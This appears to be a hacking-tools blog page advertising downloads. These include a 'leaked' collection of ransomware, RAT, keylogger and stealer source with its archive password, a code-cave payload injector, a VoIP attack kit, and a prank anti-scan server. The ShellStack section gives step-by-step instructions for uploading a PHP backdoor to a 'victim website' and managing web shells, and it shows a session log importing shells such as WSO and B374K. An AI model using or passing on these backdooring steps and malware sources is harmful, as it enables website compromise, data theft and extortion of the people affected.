Collection Package Ramsonware, Malware, BotNet - Pr1v8 Source Code Leaked

Please note, I am not responsible for your actions.

Ransomware is a type of malicious software from cryptovirology that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem – and difficult to trace digital currencies such as Ukash and Bitcoin are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

A remote administration tool (RAT) is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

Stealers the term info stealer is self-explanatory. This type of malware resides in an infected computer and gathers data in order to send it to the attacker. Typical targets are credentials used in online banking services, social media sites, emails, or FTP accounts.



Source: Wikipedia
Password: seginfo

By OffSec 2017

Download Collection Package

Read More

Search for Code Cave in All Binaries (ELF, PE and Mach-o) and Inject Payload - CAVE MINER

This tools search for code cave in binaries (Elf, Mach-o, Pe), and inject code in them.

Features

• Find code caves in ELF, PE and Mach-o
• Use custom bytes for the search (ex: 0xCC can be used as nullbytes on PE)
• See virtual address of the code cave.
• See the permissions of the code caves.
• Search custom cave size
• Inject the payload into the binary

Dependencies

• Python2.7

Installation

pip install cave-miner

Exemple

Download CAVE MINER

Read More

VoIP Penetration Testing and Exploitation Kit - Viproy

Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules

• SIP Register
• SIP Invite
• SIP Message
• SIP Negotiate
• SIP Options
• SIP Subscribe
• SIP Enumerate
• SIP Brute Force
• SIP Trust Hacking
• SIP UDP Amplification DoS
• SIP Proxy Bounce
• Skinny Register
• Skinny Call
• Skinny Call Forward
• CUCDM Call Forwarder
• CUCDM Speed Dial Manipulator
• MITM Proxy TCP
• MITM Proxy UDP
• Cisco CDP Spoofer
• Boghe VoIP Client INVITE PoC Exploit (New)
• Boghe VoIP Client MSRP PoC Exploit (New)
• SIP Message with INVITE Support (New)
• Sample SIP SDP Fuzzer (New)
• MSRP Message Tester with SIP INVITE Support (New)
• Sample MSRP Message Fuzzer with SIP INVITE Support (New)
• Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md

Download Viproy

Read More

A PHP Based Tool That Helps You To Manage All Your Backdoored Websites Efficiently - ShellStack

ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory.

With ShellStack You can

• Import PHP Shells
• Get Server Details
• Upload Files From Your System using your terminal
• And Above all You Can Manage Your Backdoors Efficiently

How To Use

1. git clone https://github.com/Tuhinshubhra/shellstack
2. cd shellstack
3. php shellstack.php
4. generatebd and exit the tool use CTRL + C - This will generate a backdoor file in the same directory as of the tool in a file named backdoor.php
5. Upload The Backdoor File To The Victim website
6. Copy The Backdoor URL and paste it in the shells.txt file present in the tool's directory and save it (Each backdoor is separated by a new line)
7. php shellstack.php
8. Enter The Serial No Assigned To The Backdoor
9. Rest is pretty Self explanatory

Watch The Video Here: https://youtu.be/umk3ZNZ5Y1I

Requirements

php
curl 

Example

root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php


________________________________________________________________________________
_______ _     _ _______               _______ _______ _______ _______ _     _
|______ |_____| |______ |      |      |______    |    |_____| |       |____/
______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
________________________________________________________________________________

                    Simple Backdoor Management System
                    Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                    Shout Out: LulZSec India  
================================================================================



List Of Backdoors:

0. http://localhost/backdoor.php
=============================================

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1


List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1


[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 

Release(s)

Version 1.0 On 14-06-2017

Screenshot

Download ShellStack

Read More

Avoid being scanned by spoiling movies on all your ports! - spoilerwall

Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports!
Firewall? How about Fire'em'all! Stop spending thousand of dollars on big teams that you don't need! Just fire up the Spoilers Server and that's it!

Movie Spoilers DB + Open Ports + Pure Evil = Spoilerwall

Set your own:

1. Clone this repo

$ git clone git@github.com:infobyte/spoilerwall.git

2. Edit the file server-spoiler.py and set the HOST and PORT variables.
   
3. Run the server
   

$ python2 server-spoiler.py

The server will listen on the selected port (8080 by default). Redirect incoming TCP traffic in all ports to this service by running:

iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 1:65535 -j DNAT --to-destination {HOST}:{PORT}

Change {HOST} and {PORT} for the values set in step (2). Also, if the traffic is redirected to localhost, run:

sysctl -w net.ipv4.conf.eth0.route_localnet=1

Using this config, an nmap scan will show every port as open and a spoiler for each one.
View the live demo running in spoilerwall.faradaysec.com

~ ❯❯❯ telnet spoilerwall.faradaysec.com 23

Trying 138.197.196.144...

Connected to spoilerwall.faradaysec.com.

Escape character is '^]'.

Gummo

Fucked up people killing cats after a tornado

Connection closed by foreign host.

Browse in Shodan (but beware of the Spoilers!):
https://www.shodan.io/host/138.197.196.144
Be careful in your next CTF - you never know when the spoilers are coming!

Download spoilerwall

Read More